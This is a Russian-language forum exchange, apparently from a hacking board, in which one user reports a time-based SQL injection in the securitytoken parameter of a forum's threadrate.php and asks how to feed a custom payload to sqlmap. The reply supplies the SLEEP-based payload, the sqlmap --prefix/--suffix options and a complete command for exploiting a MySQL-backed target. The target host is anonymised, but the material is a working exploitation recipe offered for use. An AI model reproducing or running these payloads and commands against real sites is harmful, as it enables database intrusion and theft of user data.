25.01.2014, 20:33
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от BigBanMan
Есть уязвимость. SQLi
Предположим так (заменил дабы не палить):
Url: http://www.site.com/threadrate.php?t=104496
Method: post
Param: securitytoken
Payload: "));SELECT+SLEEP(15)/*
Data: securitytoken=guest&t=104496&pp=10&page=1&vote=5
как верно составить запрос sqlmap с payload'ом чтоб было? Нигде в инете ни в документах не найти как сделать свой payload.
А без него уязвимость не видит. Прошу, помогите
Прежде чем говорить - проверьте.
За payload отвечает две опции:
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
соответственно Ваш запрос будет примерно таким:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]sqlmap[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://www.site.com/threadrate.php?t=104496"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"securitytoken=guest*&t=104496&pp=10&page=1&vote=5"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]prefix[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"));"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]dbms[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"MySQL"[/COLOR][/COLOR]
|
|
|